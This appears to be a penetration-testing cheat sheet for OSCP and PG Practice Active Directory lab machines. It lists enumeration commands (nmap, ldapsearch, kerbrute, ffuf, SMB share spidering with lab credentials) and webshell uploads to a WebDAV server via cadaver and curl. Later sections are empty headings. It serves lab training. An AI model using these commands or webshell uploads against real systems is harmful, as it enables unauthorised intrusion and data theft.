AD Set

circle-info

Based on:

  • PG Practice: Access, Hokkaido, Hutch, Nagoya, Resourced, Vault

  • PEN-200: OSCP A, OSCP B, OSCP C

circle-exclamation

No Creds

chevron-rightPort Scanhashtag

The nmap-scan script can be found herearrow-up-right.

sudo nmap-scan <target-IP>
chevron-rightDomain Enumerationhashtag
# Enumerate objects
ldapsearch -v -x -b "DC=DC01,DC=offsec" -H "ldap://192.168.120.108" "(objectclass=*)"

# Enumerate users' description field
uv run nxc ldap DC01 -u '' -p '' -M get-desc-users
kerbrute userenum -d hokkaido-aerospace.com --dc hokka /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
chevron-rightHTTP(S)hashtag
# Dirbust with a directory list
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -ac -c -u http://access/FUZZ -e .aspx,.php,

​# Dirbust with a file list
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -ic -ac -c -u http://access/FUZZ
# Connect to WebDAV
cadaver http://x7331
Authentication required for hutch on server 'x7331':
Username: x7331
Password:
# Upload a webshell
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx

# Upload a webshell directly
curl -T '/home/kali/shell.aspx' 'http://192.168.64.122/' -u x7331:Pass123!
# Create a userlist based on the site users
username-anarchy -i site_users > anarchy_output

# Create a passlist based on the site content
cewl --write cewl_output http://192.168.202.21/
chevron-rightSMBhashtag
# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999

MS01

Creds

chevron-rightUser Contexthashtag
chevron-rightHost Enumerationhashtag
chevron-rightRemote Access ✅hashtag

Check for WinRM, RDP, and SSH access:

chevron-rightSMBhashtag
chevron-rightPost-Exploitation (Cached Creds) ✅hashtag
chevron-rightPivot (Route to the domain) ✅hashtag
chevron-rightAD Attacks (Domain Data) ✅hashtag

MS02

chevron-rightUser Contexthashtag
chevron-rightHost Enumerationhashtag
chevron-rightSMBhashtag
chevron-rightMSSQLarrow-up-righthashtag
chevron-rightAD Attackshashtag
chevron-rightPost-Exploitation (Cached Creds)hashtag

Last updated